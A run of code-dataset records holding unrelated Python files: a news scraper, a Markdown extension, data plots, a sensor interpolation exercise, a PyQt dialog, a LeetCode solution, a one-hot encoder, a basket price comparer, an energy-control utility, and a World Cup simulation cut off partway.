/path/to/ENV/bin/python\nimport scrapy\nfrom article_spider import ArticleSpider\nimport news_scraper.newsscraper_service as service\n\nclass NewsFeedSpider(scrapy.Spider):\n name = 'news'\n page_number = 1\n article_scraper = ArticleSpider()\n\n start_urls = ['http://gvardeysk.gov39.ru/news/']\n\n def parse(self, response):\n service.initialize() \n for newsElement in response.xpath(\"//*[@id = 'news_list']/table\"):\n text = newsElement.xpath(\".//span[@class='news-preview-text']/div//text()\").extract_first()\n\n if text is None:\n continue\n \n words = service.cleanText(text).split()\n \n articlePageLink = newsElement.xpath(\".//a[starts-with(@href,'/news/detail.php?ELEMENT_ID')]\").extract_first() \n \n yield {\n 'day': newsElement.xpath(\".//font[@class='day']//text()\").extract_first(),\n 'month': service.parseMonth(newsElement.xpath(\".//font[@class='month']//text()\").extract_first().lower(), 'rus1'),\n 'title': newsElement.xpath(\".//a[@class='news_header']//text()\").extract_first(),\n 'text': newsElement.xpath(\".//span[@class='news-preview-text']/div//text()\").extract_first(),\n }\n\n link_to_article = newsElement.xpath(\".//a[@class='news_header']/@href\").extract_first()\n\n if link_to_article is not None:\n print(\"FOLLOW \" + link_to_article)\n yield response.follow(link_to_article, self.article_scraper.parse)\n else:\n print(\"NO ARTICLE LINK FOUND FOR \" + link_to_article)\n\n self.page_number += 1 \n next_page = response.xpath(\"//a[@href = '/news/?PAGEN_1=\" + str(self.page_number) + \"']/@href\").extract_first()\n\n if next_page is not None:\n pass\n #yield response.follow(next_page, self.parse)\n else:\n print (\"finished on page \" + str(self.page_number - 1))\n","sub_path":"spiders/newsscraper.py","file_name":"newsscraper.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"618684819","text":"#!/usr/bin/env python\n\n\"\"\"\nSnippet markdown filter\n========================\n\n- Copyright (c) 2018 Matt Soucy\n\n## Format\n\n```\n{{< tagname \"data\" >}}\n```\n\"\"\"\n\nimport markdown\n\n\nclass SnippetExtension(markdown.Extension):\n \"\"\" Snippet Extension for Python-Markdown. 
\"\"\"\n\n def __init__(self, configs):\n \"\"\"\n Create an instance of the Snippet extension\n\n Keyword arguments:\n * configs: A dict of configuration settings passed in by the user.\n \"\"\"\n # Set extension defaults\n self.config = {\n 'handlers': [{}, 'Handler callbacks']\n }\n # Override defaults with user settings\n self.setConfigs(configs)\n\n def add_inline(self, md, name, pattern_class, pattern):\n \"\"\"\n Add new functionality to the Markdown instance.\n\n Keyword arguments:\n * md: The Markdown instance.\n * md_globals: markdown's global variables.\n \"\"\"\n objPattern = pattern_class(pattern, self.config)\n objPattern.md = md\n objPattern.ext = self\n md.inlinePatterns.add(name, objPattern, \"\\}\\}'\n fullRe = prefix + tag + space + text + suffix\n self.add_inline(md, \"mastodon\", BasicSnippetPattern, fullRe)\n\n\nclass BasicSnippetPattern(markdown.inlinepatterns.Pattern):\n def __init__(self, pattern, config):\n self.pattern = pattern\n self.config = config\n super(BasicSnippetPattern, self).__init__(pattern)\n\n def handleMatch(self, match):\n\n if match:\n # Group 1 is \"everything before this\"\n tag = str(match.group(2))\n # Remove the quotes\n text = str(match.group(3))[1:-1]\n\n handlerList = self.config['handlers'][0]\n func = handlerList.get(tag, lambda id: id)\n\n return func(text)\n else:\n return \"\"\n\n\ndef makeExtension(*args, **kwargs):\n return SnippetExtension(*args, **kwargs)\n\n\nif __name__ == \"__main__\":\n import doctest\n print(doctest.testmod())\n print(\"-\" * 8)\n md = markdown.Markdown(extensions=['snippet'])\n print(md.convert(__doc__))\n\n","sub_path":"mdx_snippets.py","file_name":"mdx_snippets.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"52140850","text":"import db_mac\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.ticker import (MultipleLocator)\n\nsql = \"\"\"select \nsqrt(power((ST_X(d.geom) - 382983),2) + power((ST_Y(d.geom) - 5824610),2)) as distance, d.speed*0.514444\n from dump d , bufferzone b\n where\n st_within(d.geom, b.geom)\n and d.vert_rate > 0 ---start\n --and d.vert_rate <= 0 -- land\n and d.track > 70 and d.track < 90 -- start\n --and d.track > 250 and d.track < 270 -- land\n and b.name like 'TXL'\nand d.speed <= 300\nand sqrt(power((ST_X(d.geom) - 382983),2) + power((ST_Y(d.geom) - 5824610),2)) <= 11000\n\n \"\"\"\n\ndata = np.array(list(db_mac.execute(sql))).T\ndistance = [round(i) for i in data[0, :]]\nspeed = [round(i) for i in data[1, :]]\n\nfig, ax = plt.subplots(figsize=(10, 4))\nax.grid(True)\nax.set_title('Fluggeschwindigkeiten im Geofence mit postiver Vertikalrate')\nax.margins(0)\n# ax.axvline(x=4191,color='red')\nax.set_xlim(0, 11000)\nax.yaxis.set_major_locator(MultipleLocator(10))\nax.xaxis.set_major_locator(MultipleLocator(1000))\nax.set(ylabel=\"Geschwindigkeit in Meter/Sekunde\")\nax.set(xlabel=\"Distanz zum Zentroid (E:382983 N:5824610 (UTM-33N WGS84) in Meter\")\nax.scatter(distance, speed, 0.01)\nplt.tight_layout()\nplt.show()\n","sub_path":"plots/plot_speed_start.py","file_name":"plot_speed_start.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"369272997","text":"# -*- coding: utf-8 -*-\n\n#############################################################################\n# #\n# EIDEAnalog practising section #\n# File: EA_7000_EXERCISEb.py #\n# #\n# Archivo: EA_7000_EXERCISEb.py 
#\n# Librería EIDEAnalog (ejercicios de autoevaluación). #\n# Consulte punto 7.- Tablas de sensores (sensorTable) #\n# en EIDEAnalog_ASI_SE_HIZO.pdf (https://github.com/Clave-EIDEAnalog/DOCS) #\n# #\n# Copyright (c) 2020. Clave Ingenieros S.L.; #\n# vicente.fombellida@claveingenieros.es #\n# #\n#############################################################################\nimport os\n\nclass sensorTable():\n \"\"\" Class for sensor tables \"\"\"\n head = os.getcwd()\n tables = os.path.join(head, 'SENSOR_TABLES')\n\n def __init__(self, archivo):\n\n self.name = archivo.split(\".\")[0]\n self.table = []\n self.archivoPath = os.path.join(sensorTable.tables, self.name + '.txt')\n self.read(self.archivoPath)\n \n self.mapLen = len(self.table)\n self.mapMinimum = self.table[0][0]\n self.mapMaximum = self.table[len(self.table) - 1][0]\n self.sort()\n self.verify()\n\n self.position = -1\n\n def read(self, file):\n fichero = open(self.archivoPath, \"r+\")\n for linea in fichero:\n pointsList = (float(linea.split(\",\")[0]),\n float(linea.split(\",\")[1]))\n self.table.append(pointsList)\n fichero.close()\n\n def sort(self):\n self.table.sort()\n\n def verify(self):\n if self.mapLen < 4:\n raise EIDEError(\"\", \"Sensor table error: less than three points\")\n for counter, i in enumerate(self.table):\n if counter == self.mapLen - 1:\n # Table top reached.\n return\n if i[0] == self.table[counter+1][0]:\n raise EIDEError(\"\", \"Sensor table error: double abcissa\")\n\n def lookup(self, abcissa):\n \"\"\" Return ordinate for abcissa \"\"\"\n return self.linearInterpolate(self.abcissaPoints(\n self.pointer(abcissa)), abcissa)\n \n def pointer(self, abcissa):\n \"\"\" Return position of equal or first smaller number \"\"\" \n if abcissa < self.table[0][0]:\n # abcissa 'below' table.\n return 0\n for contador,i in enumerate(self.table):\n if i[0] > abcissa:\n return contador - 1\n return contador\n \n def abcissaPoints(self, pointer): \n \"\"\" Return a list holding interpolation points \"\"\"\n if pointer >= (self.mapLen - 1):\n # Point 'above' table.\n return (self.table[self.mapLen - 2],\n self.table[self.mapLen - 1])\n return (self.table[pointer],\n self.table[pointer + 1])\n \n def linearInterpolate(self, points, abcissa):\n \"\"\" Return a list holding interpolation points \"\"\"\n x1 = points[0][0]\n y1 = points[0][1]\n x2 = points[1][0]\n y2 = points[1][1]\n m = (y2-y1)/(x2-x1)\n b = y2 - (x2/(x2-x1))*(y2-y1)\n return (m * abcissa + b)\n\ntable = sensorTable('VAPOUR_PRESSURE')\nvalues = [36.0, 62.5]\nfor i in values:\n print ('For', i, \"table gives\", table.lookup(i))\n","sub_path":"EA_7000_EXERCISEb.py","file_name":"EA_7000_EXERCISEb.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"450767033","text":"import datetime\nimport os\n\nimport pandas as pd\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import pyqtSlot\n\nfrom xl_backend import Backend\nfrom GUI.dialog_revert import Ui_Revert_Dialog_Base\n\n\nclass DialogRevert(Ui_Revert_Dialog_Base):\n\n def __init__(self, Dialog, db):\n self.db = db\n self.revert_to_log = '' # Which database to roll back\n self.revert_to_file = '' # Which backup file to roll to\n self.setupUi(Dialog)\n\n def setupUi(self, Dialog):\n super().setupUi(Dialog)\n for log_name in Backend.excel_format.keys():\n self.revert_log.addItem(str(log_name))\n self.log_type_selected(self.revert_log.currentText())\n\n # TODO: Plumb slider and spin box to 
revert_files slots\n self.revert_log.currentTextChanged.connect(self.log_type_selected)\n self.revert_files.cellDoubleClicked.connect(self.file_selected)\n\n @pyqtSlot(str)\n def log_type_selected(self, log_val):\n self.revert_step_slider.setEnabled(True)\n self.revert_steps_spin.setEnabled(True)\n self.populate_file_table(log_val)\n\n def populate_file_table(self, log_val):\n if 'workout' in log_val.lower():\n bak_files = self.db.get_wl_temp_files()\n elif 'weight' in log_val.lower():\n bak_files = self.db.get_bw_temp_files()\n elif 'lift' in log_val.lower():\n bak_files = self.db.get_lt_temp_files()\n else:\n bak_files = None\n\n if bak_files:\n n_backups = len(bak_files)\n max_steps_back = -1 * n_backups\n self.revert_step_slider.setMinimum(max_steps_back)\n self.revert_steps_spin.setMinimum(max_steps_back)\n self.revert_steps_spin.setMaximum(max(-1, max_steps_back))\n self.revert_step_slider.setMaximum(max(-1, max_steps_back))\n\n self.revert_files.clearContents()\n self.revert_files.setRowCount(len(bak_files))\n for row, bak_file in enumerate(reversed(bak_files)):\n if os.path.isfile(bak_file):\n\n last_modified = datetime.datetime.fromtimestamp(os.path.getmtime(bak_file))\n cell1 = QtWidgets.QTableWidgetItem()\n cell1.setText(str(last_modified))\n self.revert_files.setItem(row, 0, cell1)\n\n cell2 = QtWidgets.QTableWidgetItem()\n cell2.setText(bak_file)\n self.revert_files.setItem(row, 1, cell2)\n self.revert_files.selectRow(0)\n\n @pyqtSlot(int)\n def file_selected(self, file_row):\n filename = self.revert_files.item(file_row, 1).text()\n if not filename or not os.path.isfile(filename):\n return\n self.revert_preview.setEnabled(True)\n self.revert_preview.clearContents()\n # TODO: once refactoring of accessory calls in xl_backend is complete, use Backend.import__\n file_preview = pd.read_excel(filename)\n\n # Setup Header\n cols = file_preview.keys()\n n_cols = len(cols)\n self.revert_preview.setColumnCount(n_cols)\n self.revert_preview.setHorizontalHeaderLabels(cols)\n\n # Populate table\n n_rows = len(file_preview)\n self.revert_preview.setRowCount(n_rows)\n\n curr_row = 0\n for row_idx, row in file_preview.iterrows():\n col_idx = 0\n for col_name, cell_val in row.iteritems():\n cell = QtWidgets.QTableWidgetItem()\n cell.setText(str(cell_val))\n self.revert_preview.setItem(curr_row, col_idx, cell)\n col_idx += 1\n curr_row += 1\n\n self.revert_to_log = self.revert_log.currentText()\n self.revert_to_file = filename\n","sub_path":"GUI/DialogRevert.py","file_name":"DialogRevert.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"96742425","text":"\"\"\" 11. Container With Most Water\nhttps://leetcode.com/problems/container-with-most-water/\n\nGiven n non-negative integers a1, a2, ..., an , where each represents a point at coordinate (i, ai). n vertical lines are drawn such that the two endpoints of line i is at (i, ai) and (i, 0). Find two lines, which together with x-axis forms a container, such that the container contains the most water.\n\nNote: You may not slant the container and n is at least 2.\n\nThe above vertical lines are represented by array [1,8,6,2,5,4,8,3,7]. 
In this case, the max area of water (blue section) the container can contain is 49.\n\n\n\"\"\"\n# attempt 1 - too long - timepout => O(N^2)\nclass Solution:\n def maxArea(self, height: List[int]) -> int:\n max_vol = 0\n for i in range(len(height) - 1):\n for j in range(i + max_vol // height[i], len(height)):\n max_vol = max(max_vol, (j - i) * min(height[i], height[j]))\n return max_vol\n\n# attempt 2:\n# looked into the solution\n\nclass Solution:\n def maxArea(self, height: List[int]) -> int:\n max_vol = 0\n i = 0\n j = len(height) - 1\n while i < j:\n # print(\"i: {}; j: {}\".format(i, j))\n vol = (j - i) * min(height[i], height[j])\n # print(\"vol: {}\".format(vol))\n max_vol = max(max_vol, vol)\n # print(\"max_vol: {}\".format(max_vol))\n if height[i] <= height[j]:\n i += 1\n else:\n j -= 1\n return max_vol\n\n\n\"\"\"\nRuntime: 140 ms, faster than 29.22% of Python3 online submissions for Container With Most Water.\nMemory Usage: 14.2 MB, less than 95.79% of Python3 online submissions for Container With Most Water.\n\"\"\"","sub_path":"algorithms/00/11-20/0011_container_with_most_water/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"53550413","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.externals import six\n\n\nclass One_Hot_Convertor(BaseEstimator, TransformerMixin):\n def __init__(self, dtype=np.float64, separator=\"=\", replace = True, sparse=True,\n sort=True, drop_one=True):\n self.dtype = dtype\n self.separator = separator\n self.sparse = sparse\n self.sort = sort\n self.drop_one = drop_one\n self.replace = replace\n\n def fit(self, df, y=None):\n \"\"\"Learn a list of feature name -> indices mappings.\n Parameters\n ----------\n df : DataFrame\n y : (ignored)\n Returns\n -------\n self\n \"\"\"\n feature_names = []\n vocab = {}\n default_features = []\n all_features_mult_dict = {col : 1 for col in df.columns}\n\n\n for col in df:\n feature_added = False\n features_created_in_this_col = []\n mult = 0\n\n for index in df.index:\n val = df.loc[index, col]\n\n if isinstance(val, six.string_types):\n feature = \"%s%s%s\" % (col, self.separator, val)\n if feature not in vocab:\n vocab[feature] = len(vocab)\n feature_names.append(feature)\n features_created_in_this_col.append(feature)\n mult += 1\n feature_added = True\n\n if feature_added and len(feature_names) > 1 and self.drop_one:\n default = feature_names.pop()\n features_created_in_this_col.pop()\n del(vocab[default])\n default_features.append(default)\n\n if feature_added:\n # print('col = ', col)\n del (all_features_mult_dict[col])\n for f in features_created_in_this_col:\n all_features_mult_dict[f] = mult\n\n self.feature_names_ = feature_names\n self.vocabulary_ = vocab\n self.default_features_ = default_features\n\n self.all_features_mult_dict_ = all_features_mult_dict\n\n return self\n\n\n\n def transform(self, df, y=None):\n\n # get parameters from the Object.fit() operation\n feature_names = self.feature_names_\n vocab = self.vocabulary_\n default_features = self.default_features_\n all_features_mult_dict = self.all_features_mult_dict_\n\n # print(feature_names)\n df_cp = df.copy() # make a copy\n for feature in feature_names:\n df_cp[feature] = 0\n\n\n for col in df:\n col_expanded = False\n for index in df.index:\n val = df.loc[index, col]\n if isinstance(val, six.string_types):\n feature = \"%s%s%s\" % (col, 
self.separator, val)\n if feature in vocab:\n df_cp.loc[index, feature] = 1\n col_expanded = True\n if col_expanded and self.replace:\n df_cp = df_cp.drop(col, axis = 1)\n\n return df_cp\n\n\n\n\nif __name__ == '__main__':\n data = {'col1_str': ['A', 'B', 'A', 'B', 'B', 'C', 'D'],\n 'col2_int': [100, 101, 102, 102, 101, 100, 100],\n 'col3_float': [1.1, 1.1, 5.2, 2.3, 2.5, 2.0, 1.1]}\n\n\n df = pd.DataFrame(data)\n print(df)\n #df.col2_int = df.col2_int.astype(str)\n\n ohc = One_Hot_Convertor() # set replace=Flse if you want to see the original column\n ohc.fit(df)\n # print('fm', ohc.feature_names_)\n # print('voc', ohc.vocabulary_)\n # print('def', ohc.default_features_)\n # print('mult', ohc.all_features_mult_dict_)\n\n df2 = ohc.transform(df)\n print(df2)\n # print(df2.mean())","sub_path":"kaggle/ames_housing/2017-10-01/functions/One_Hot_Convertor.py","file_name":"One_Hot_Convertor.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"137538824","text":"##############################################################################\n# This file contains sevral functions reguarding the exercise of basket comperation.\n# It contains 12 functions that are listed in the exercise\n# with two extra function for logic breaking of a lage function\n# #(this functions are max_value,contains_word).\n\n##############################################################################\n\nimport xml.etree.ElementTree as ET\nimport re\n\nITEM_NAME_TAG = 'ItemName'\nITEM_CODE_TAG = 'ItemCode'\nITEM_PRICE_TAG = 'ItemPrice'\nSTORE_ID = 'StoreId'\nITEMS_TAG = 'Items'\nITEM_TAG = 'Item'\nPUNISHMENT = 1.25\n\ndef read_prices_file(filename):\n '''\n\n Read a file of item prices into a dictionary. The file is assumed to\n be in the standard XML format of \"misrad haclcala\".\n Returns a tuple: store_id and a store_db, \n where the first variable is the store name\n and the second is a dictionary describing the store. \n The keys in this db will be ItemCodes of the different items and the\n values smaller dictionaries mapping attribute names to their values.\n Important attributes include 'ItemCode', 'ItemName', and 'ItemPrice'\n '''\n\n document = ET.parse(filename)\n root = document.getroot()\n store_db = {}\n ID = root.find(STORE_ID)\n the_StoreID = ID.text\n\n Items = root.find(ITEMS_TAG)\n\n if Items != None:\n for item in Items.findall(ITEM_TAG):\n\n itemcode = item.find(ITEM_CODE_TAG)\n if itemcode != None:\n store_db[itemcode.text] = {}\n for element in item.findall('*'):\n store_db[itemcode.text][element.tag] = element.text\n\n return the_StoreID, store_db\n\n\ndef contains_word(text, word):\n \"\"\"this func receives a text and a letter and returns True\n if the word is in the text\"\"\"\n #for filter_store\n return (' ' + word + ' ') in (' ' + text + ' ')\n\n\ndef filter_store(store_db, filter_txt):\n '''\n Create a new dictionary that includes only the items \n that were filtered by user.\n I.e. items that text given by the user is part of their ItemName. 
\n Args:\n store_db: a dictionary of dictionaries as created in read_prices_file.\n filter_txt: the filter text as given by the user.\n '''\n\n store_db_new = {}\n dictionary = store_db\n\n for key in dictionary:\n if contains_word(dictionary[key][ITEM_NAME_TAG], filter_txt) is True:\n store_db_new[key] = dictionary[key]\n return store_db_new\n\n\ndef sum_basket(price_list):\n '''\n Receives a list of prices\n Returns a tuple - the sum of the list (when ignoring Nones) \n and the number of missing items (Number of Nones)\n\n '''\n sum_price_list = sum(filter(None, price_list))\n missing_items = 0\n for i in price_list:\n if i == None:\n missing_items += 1\n\n return sum_price_list, missing_items\n\n\ndef get_attribute(store_db, ItemCode, tag):\n '''\n Returns the attribute (tag) \n of an Item with code: Itemcode in the given store\n\n '''\n try:\n return store_db[ItemCode][tag]\n except KeyError:\n return None\n\n\ndef string_item(item):\n '''\n Textual representation of an item in a store.\n Returns a string in the format of '[ItemCode] (ItemName)'\n\n '''\n try:\n return \"[{}]\\t{{{}}}\".format(item[ITEM_CODE_TAG], item[ITEM_NAME_TAG])\n except (KeyError ,TypeError):\n return None\n \n\ndef string_store_items(store_db):\n '''\n Textual representation of a store.\n Returns a string in the format of:\n string representation of item1\n string representation of item2\n '''\n str_out = \"\"\n for item in store_db:\n item_str = string_item(store_db[item])\n if item_str != None:\n str_out += item_str + \"\\n\"\n return str_out\n\n\ndef create_basket_from_txt(basket_txt): \n '''\n Receives text representation of few items (and maybe some garbage \n at the edges)\n Returns a basket- list of ItemCodes that were included in basket_txt\n\n '''\n # use RE to find the exac locations where a full product code\n # including the [] is found.\n expression = re.compile('\\[(\\d+)\\]')\n return expression.findall(str(basket_txt))\n\n\ndef get_basket_prices(store_db, basket):\n '''\n Arguments: a store - dictionary of dictionaries and a basket - \n a list of ItemCodes\n Go over all the items in the basket and create a new list \n that describes the prices of store items\n In case one of the items is not part of the store, \n its price will be None.\n\n '''\n float_lst = []\n for obj in basket:\n try:\n float_lst.append(float(store_db.get(obj).get(ITEM_PRICE_TAG)))\n except AttributeError:\n float_lst.append(None)\n\n return float_lst\n\n\ndef basket_item_name(stores_db_list, ItemCode):\n '''\n stores_db_list is a list of stores (list of dictionaries of\n dictionaries)\n Find the first store in the list that contains the item and return its\n string representation (as in string_item())\n If the item is not avaiable in any of the stores return only [ItemCode]\n\n '''\n for i in range(len(stores_db_list)):\n for key in stores_db_list[i]:\n if key == ItemCode:\n return string_item(stores_db_list[i][key])\n if i == len(stores_db_list) - 1:\n return '['+ItemCode+']'\n\n\ndef save_basket(basket, filename):\n '''\n Save the basket into a file\n The basket reresentation in the file will be in the following format:\n [ItemCode1]\n [ItemCode2]\n ...\n [ItemCodeN]\n '''\n str_to_file = ''\n for i in range(len(basket)):\n str_to_file += '['+str(basket[i])+']' + '\\n'\n\n file = open(filename, 'w')\n file.write(str_to_file)\n file.close()\n\n\ndef load_basket(filename):\n '''\n Create basket (list of ItemCodes) from the given file.\n The file is assumed to be in the format of:\n [ItemCode1]\n [ItemCode2]\n ...\n 
[ItemCodeN]\n '''\n basket = []\n file = open(filename, 'r')\n for line in file:\n basket.append(line[1: -2])\n file.close()\n return basket\n\n\ndef max_value(lst, idx):\n \"\"\"recieves a list of lists that contains numbers\n and nones and an index, returns the maximum value among\n all the lists (treats none as 0)\"\"\"\n max_val = 0\n for obj in lst:\n if obj[idx] != None and obj[idx]>max_val:\n max_val = obj[idx]\n return max_val\n\n\ndef best_basket(list_of_price_list):\n '''\n Arg: list of lists, where each inner list is list of prices as created\n by get_basket_prices.\n Returns the cheapest store (index of the cheapest list) given that a\n missing item has a price of its maximal price in the other stores *1.25\n\n '''\n sum_list = []\n for store in range(len(list_of_price_list)):\n sum_list.append(0)\n\n for store in range(len(list_of_price_list)):\n for price in range(len(list_of_price_list[store])):\n if list_of_price_list[store][price] == None:\n max_val = PUNISHMENT * max_value(list_of_price_list,price)\n sum_list[store] += max_val\n else:\n sum_list[store] += list_of_price_list[store][price]\n for i in range(len(sum_list)):\n if sum_list[i] == min(sum_list):\n return i\n","sub_path":"ex5/Integration/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":7340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"536035802","text":"import math\nfrom scipy import special\nimport numpy as np\nfrom scipy.stats import poisson\nfrom collections.abc import Iterable\n\n# PI controller that takes as input kp, ki, current error and previous integral error\ndef PI(Kp, Ki, err, prev_i_err):\n i_err = prev_i_err + err\n u = Kp*err + Ki*i_err\n return u, i_err\n\n# Aggregate demand from agents assuming proportional control \ndef aggregate_demand(CR, mu, battery):\n demand = 0\n for a,b in zip(mu, battery):\n tmp = poisson.ppf(CR, 1*a) - b\n demand += max(0, tmp)\n return demand\n\n# Aggregate demand from agents assuming PI control\ndef aggregate_demand_PI(CR, mu, battery, i_err, Kp, Ki):\n demand = 0\n for a,b,c in zip(mu, battery, i_err):\n err = poisson.ppf(CR, 1*a) - b\n tmp, _ = PI(Kp, Ki, err, c)\n demand += max(0, tmp)\n return demand\n\n# Define Supply Curve approximation function\ndef supply_curve(Q, price, function='sigmoid'):\n supply = 0\n error = True\n if function == 'sigmoid':\n error = False\n supply = Q + special.logit(price)\n elif function == 'linear':\n error = False\n supply = Q * price\n elif function == 'quadratic':\n error = False\n supply = Q * (price ** 1/2)\n if error:\n print('Function Type not not specified')\n return supply\n\n# Bisection search to find intersection of demand and supply curves\ndef bisection_search(c, p, k, h, Q, mu, battery, i_err=0, Kp=1, Ki=0, sf='sigmoid', mode='basic'):\n tol = 1e-5\n if sf == 'sigmoid':\n lb = 1e-20\n ub = c - lb\n else: \n lb = 1e-20\n ub = 1e2\n iter_limit = 10000\n for _ in range(iter_limit):\n mp = (ub + lb)/2\n tmp = (p - mp + k)/(p - mp + k + (0.1*mp) + h)\n var1 = supply_curve(Q, mp, function=sf)\n if mode == 'basic':\n var2 = aggregate_demand(tmp, mu, battery)\n elif mode == 'PI':\n var2 = aggregate_demand_PI(tmp, mu, battery, i_err, Kp, Ki)\n var3 = var1 - var2\n if abs(var3) < 1 or (ub - lb)/2 < tol:\n #print('converged')\n break\n if var3 > 0:\n ub = mp\n else:\n lb = mp\n return mp\n\ndef crc(p, c, k, mu, n, battery, Q, i_err=0, Kp=1, Ki=0, gamma=1, h=0, capacity=1e2):\n z = np.zeros(n)\n a1 = np.zeros(n)\n new_i_err = np.zeros(n)\n space = capacity - 
battery\n\n cost = bisection_search(c, p, k, h, Q, mu, battery, i_err, Kp, Ki, sf='sigmoid', mode='PI')\n CR = (p - cost + k)/(p - cost + k + (0.1*cost) + h)\n\n for i in range(n):\n z[i] = min(poisson.ppf(CR, 1*mu[i]), capacity)\n err = poisson.ppf(CR, 1*mu[i]) - battery[i]\n u, new_i_err[i] = PI(Kp, Ki, err, i_err[i])\n u = max(0, u)\n a1[i] = min(u, space[i])\n return a1, z, cost, new_i_err\n\ndef basic_crc(p, c, k, mu, n, battery, Q, gamma=1, h=0, capacity=1e2):\n z = np.zeros(n)\n a1 = np.zeros(n)\n new_i_err = np.zeros(n)\n space = capacity - battery\n\n cost = bisection_search(c, p, k, h, Q, mu, battery, sf='sigmoid')\n #cost = cost/c\n CR = (p - cost + k)/(p - cost + k + (0.1*cost) + h)\n\n for i in range(n):\n z[i] = min(poisson.ppf(CR, 1*mu[i]), capacity)\n err = poisson.ppf(CR, 1*mu[i]) - battery[i]\n u = max(0, err)\n a1[i] = min(u, space[i])\n return a1, z, cost\n# Psuedo Reward v1 uses area under supply curve as effective cost and assumes ideal step function\ndef psuedo_reward_v1(p, c, k, Q, n, demands, batteries, actions):\n rewards = np.zeros(n)\n total_order_quantity = actions.sum(-1)\n excess = max(0, total_order_quantity - Q)\n for agent in range(n):\n demand = demands[agent]\n battery = batteries[agent]\n supplied = min(demand, battery) * p\n # Penalty for Inability to Supply Sufficient Energy from Battery\n mismatch = max(0, demand - battery) * k\n if total_order_quantity == 0:\n # Proportional Cost of Exceeding Renewable Supply\n proportion_of_excess = 0\n # Discharge of Battery modelled as a Holding Cost\n discharge = 0\n else:\n # Proportional Cost of Exceeding Renewable Supply\n proportion_of_excess = max(0, (excess/total_order_quantity)*actions[agent]) * c\n # Discharge of Battery modelled as a Holding Cost\n discharge = max(0, battery - demand) * 0.1 * c * (excess/total_order_quantity)\n reward = supplied - (mismatch+proportion_of_excess+discharge)\n if isinstance(reward, Iterable):\n reward = sum(reward)\n rewards[agent] = reward \n return rewards\n\n# Pseudo Reward v2 uses the cost price found using bisection search\ndef psuedo_reward_v2(p, c, k, Q, n, demands, batteries, actions):\n rewards = np.zeros(n)\n total_order_quantity = actions.sum(-1)\n excess = max(0, total_order_quantity - Q)\n for agent in range(n):\n demand = demands[agent]\n battery = batteries[agent]\n # Reward for Suplying Energy to User\n supplied = min(demand, battery) * p\n # Penalty for Inability to Supply Sufficient Energy from Battery\n mismatch = max(0, demand - battery) * k\n # Cost of Purchasing Energy\n cost = actions[agent]*c\n # Discharge Modelled as Holding Cost\n discharge = max(0, battery - demand) * 0.1 * c\n reward = supplied - (mismatch+cost+discharge)\n if isinstance(reward, Iterable):\n reward = sum(reward)\n rewards[agent] = reward\n return rewards\n","sub_path":"mgrid/util_crc.py","file_name":"util_crc.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"405485970","text":"from math import e, sqrt\r\nfrom random import randint, shuffle\r\nfrom time import sleep, time\r\n\r\ndebug = False\r\nif debug:\r\n lightSpeed = True\r\nelse:\r\n while True:\r\n a = input(\"Qual modo deseja jogar? [COPA DO MUNDO] = 0 | [SIMULACOES] = 1\\n\")\r\n if a == '0' or a == '1':\r\n break\r\n else:\r\n print(\"Valor invalido! 
Tente novamente...\")\r\n a = int(a)\r\n lightSpeed = False\r\n if a:\r\n lightSpeed = True\r\ngols = 0\r\njogos = 0\r\n\r\nif debug:\r\n meta = [237, 196, 11, 53, 1150, 383, 16, 32, 1150, 99, 40, 20, 237, 805, 53, 40, 1788, 99, 53, 20, 80, 99, 16, 1610, 732, 473, 16, 11, 237, 32, 53, 158 ]\r\ntimes = ['URUGUAI', 'RUSSIA', 'ARABIA SAUDITA', 'EGITO', 'ESPANHA', 'PORTUGAL', 'IRAN', 'MARROCOS', 'FRANCA', 'DINAMARCA', 'PERU', 'AUSTRALIA', 'CROACIA', 'ARGENTINA', 'NIGERIA', 'ISLANDIA', 'BRASIL', 'SUICA', 'SERVIA', 'COSTA RICA', 'SUECIA', 'MEXICO', 'COREIA DO SUL', 'ALEMANHA', 'BELGICA', 'INGLATERRA', 'TUNISIA', 'PANAMA', 'COLOMBIA', 'JAPAO', 'SENEGAL', 'POLONIA' ]\r\npower = [1.4052, 1.3407, 0.7873, 0.9909, 2.2011, 1.577, 0.753, 0.8954, 2.17475, 1.1492, 0.99955,0.851, 1.4249, 1.9901, 1.042, 0.95, 2.5319, 1.1801, 1.0558, 0.8717, 1.1509, 1.1802, 0.8691, 2.41, 1.861, 1.65933, 0.785, 0.8011, 1.4091, 0.9028, 1.00367, 1.2681 ]\r\noffensiveness = [1.97, 1.86, 1.52, 1.1, 1.6, 1.72, 0.86, 1.07, 2, 1.68, 1.93, 1.41, 1.36, 1.67, 1.41, 1.01, 2.03, 2.18, 1.86, 1.49, 2.02, 1.6, 1.78, 2.14, 1.84, 1.22, 1.3, 2.22, 1.78, 1.18, 1.27, 1.67 ]\r\natk = []\r\ndefense = []\r\nfor i in range(len(times)):\r\n atk.append( sqrt( offensiveness[i] * power[i] ) )\r\n defense.append( sqrt( offensiveness[i]/(power[i]*1.0) ) )\r\n\r\n# 2.64 = media de gols por partida na copa do mundo de 2018\r\nmediaGolsSelecao = 2.64\r\natkMedio = 2 * sum(atk)/len(atk) 